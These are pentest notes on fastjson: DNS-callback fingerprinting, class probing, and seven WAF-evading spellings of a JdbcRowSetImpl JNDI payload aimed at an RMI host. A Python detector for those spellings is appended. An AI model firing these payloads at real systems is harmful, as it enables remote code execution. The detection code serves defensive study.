Reference: https://github.com/Firebasky/fastjson

### Pitfalls

A low fastjson version can stop the DNSlog probe from firing (I ran into the same thing with deserialization).

### Identifying fastjson

Add an extra key/value pair to the JSON. If the response does not error, the backend may be fastjson: Jackson tolerates missing keys but not extra ones, so an extra key will more or less always produce an error.
- Check whether the backend uses fastjson via a DNS callback:
  - `{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}`
  - `{"@type":"java.net.InetAddress","val":"dnslog"}`
  - `{"a":"x\u001a\u001a"}`
### Checking whether a class exists during exploitation

Use `@type` to probe for the presence of a class (`xxx.xxx.xxx` is a placeholder for the class name being probed):

```json
{ "@type":"java.lang.AutoCloseable", "@type":"xxx.xxx.xxx" }
```

If it errors, the class exists; otherwise it does not.
### bypass waf
1. By default fastjson strips spaces, `\b`, `\n`, `\r`, `\f` and similar characters outside keys and values, and it also automatically decodes Unicode and hexadecimal escapes in keys and values.
```json
{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{ "@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{/*s6*/"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{\n"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"@type"\b:"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\u0040\u0074\u0079\u0070\u0065":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
{"\x40\x74\x79\x70\x65":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://10.251.0.111:9999","autoCommit":true}
```
Summary of WAF bypass techniques: https://www.sec-in.com/article/950
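A defender-side illustration of the point above, added here and not taken from the original notes or the linked references: a signature check for the `@type` key that first canonicalises the input the way these notes say fastjson's lexer does (dropping block comments and the listed control characters between tokens, decoding `\u` and `\x` escapes inside string literals), compared against a naive substring check that the listed variants slip past. The sample inputs are constructed and use a placeholder class name; treating two-character spellings such as `\n` outside a string literal as skippable is an assumption of this example, not a documented fastjson behaviour.

```python
import re

# Constructed samples mirroring the spellings listed above, with a placeholder
# class name instead of a real gadget. "\n" and "\b" here are the actual
# control characters; the \u / \x samples carry literal backslash escapes.
SAMPLES = [
    '{"@type":"example.ClassName","v":1}',
    '{ "@type":"example.ClassName","v":1}',
    '{/*s6*/"@type":"example.ClassName","v":1}',
    '{\n"@type":"example.ClassName","v":1}',
    '{"@type"\b:"example.ClassName","v":1}',
    '{"\\u0040\\u0074\\u0079\\u0070\\u0065":"example.ClassName","v":1}',
    '{"\\x40\\x74\\x79\\x70\\x65":"example.ClassName","v":1}',
]

# Characters the notes say fastjson skips between tokens.
_SKIP = {" ", "\t", "\b", "\n", "\r", "\f"}
# \uXXXX and \xXX escapes inside a string literal.
_ESCAPE_RE = re.compile(r"\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})")
# Signature applied to the canonical form.
AUTOTYPE_KEY = re.compile(r'"@type"\s*:')


def _decode_escapes(token: str) -> str:
    """Decode \\uXXXX and \\xXX escapes inside one string literal token."""
    return _ESCAPE_RE.sub(lambda m: chr(int(m.group(1) or m.group(2), 16)), token)


def normalize(raw: str) -> str:
    """Canonicalise raw JSON text into the form the parser would act on:
    comments and skippable characters removed between tokens, escapes decoded
    inside string literals. String contents are otherwise copied verbatim."""
    out = []
    i, n = 0, len(raw)
    while i < n:
        c = raw[i]
        if c == '"':
            # String literal: advance to the closing quote, honouring backslash escapes.
            j = i + 1
            while j < n and raw[j] != '"':
                j += 2 if raw[j] == "\\" else 1
            out.append(_decode_escapes(raw[i:j + 1]))
            i = j + 1
        elif raw.startswith("/*", i):
            # Block comment between tokens is dropped entirely.
            end = raw.find("*/", i + 2)
            i = n if end == -1 else end + 2
        elif c in _SKIP:
            i += 1
        elif c == "\\" and i + 1 < n and raw[i + 1] in "bnrft":
            # Assumption for this example: a two-character escape spelling
            # outside a string literal is treated like the control character.
            i += 2
        else:
            out.append(c)
            i += 1
    return "".join(out)


def has_autotype(raw: str) -> bool:
    """Signature check on the canonical form: resistant to the listed variants."""
    return AUTOTYPE_KEY.search(normalize(raw)) is not None


def naive_has_autotype(raw: str) -> bool:
    """The raw substring check a simplistic rule would use, shown for contrast."""
    return '"@type":' in raw


def missed_by_naive_check() -> list:
    """Indices of samples that the naive rule misses but the normalised check catches."""
    return [i for i, s in enumerate(SAMPLES)
            if has_autotype(s) and not naive_has_autotype(s)]


if __name__ == "__main__":
    for i, s in enumerate(SAMPLES):
        print(i, "naive:", naive_has_autotype(s), "normalised:", has_autotype(s))
    print("missed by naive check:", missed_by_naive_check())
```

The point of the normaliser is that a detection rule should run on the same representation the parser will act on; matching on raw bytes leaves every spelling the lexer silently tolerates as a gap.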